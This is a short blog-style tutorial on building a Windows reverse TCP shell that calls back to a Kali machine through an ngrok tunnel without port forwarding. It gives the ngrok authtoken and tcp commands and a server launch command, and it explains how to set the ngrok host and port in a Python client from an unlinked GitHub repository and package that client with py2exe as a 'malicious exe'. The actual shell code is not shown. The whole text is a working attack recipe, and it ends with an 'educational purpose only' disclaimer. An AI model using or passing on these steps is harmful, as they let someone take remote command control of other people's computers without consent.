
!!!!!!!!![NO PORT FORWARDING]!!!!!!!!!! Reverse tcp shell and configure ngrok

 Reverse TCP shell using ngrok and python(Without port-forwarding)

Windows Environment must have the following tools installed(im using win 7 --- 32-bit) :

  • Python 2.7 -  link
  • py2exe-0.6.9.win32-py2.7.exe  - link

kali linux:

  • Python 2.7 -  link
  • Ngrok - link (Download the Linux package)

After successful installation of the following tools you can start building malicious executable.

Go to kali linux and do the following:

Signup and sign in into your account

After sign in ,go to  your dashboard you can find token

./ngrok authtoken <YOUR TOKEN>

Ngrok - link (Download the Linux package) 

Download the ngrok.zip file and extract which will look something like the below .

    Extract the ngrok.zip and navigate to the folder using terminal

./ngrok authtoken <YOUR TOKEN>

And press enter,Now you have configured the ngrok so you can use the tcp functions
The run the following command

./ngrok tcp 8080

After this a tcp connection is opened on port 8080 which can be access from anywhere through internet.


                                                      IP address        : PORT address

     0.tcp.ngrok.io     : 19993 

     Github link :- link

Download the files from github

Copy the files to the corresponding environment .
Now run the Server script from kali linux ,

python tcpreverseshell_server.py

The tcp server is running now  ,so now it can accept the clients .

Lets go to the windows machine and start building the executable :

 Open the tcpreverseshell_client.py and using Python idle

 Replace with your ip and port address from ngrok and save the python script

   Make sure the windows is installed with python2.7 and py2exe module ,right click the setup.py file  with python idle

 Then go to Run->Run module
 Now two folder will be generated by py2exe after running the setup.py

Go to dist Folder and you can find the executable application named as tcpreverseshell_client.exe,this is our malicious exe .

Double click the executable to establish the connection to the server.

Now check the kali server terminal , you have the connection established to the windows machine

Now you can try the command prompt commands and play around with this

[This is for your educational purpose only i am not responsible if you use this for malicious purpose]


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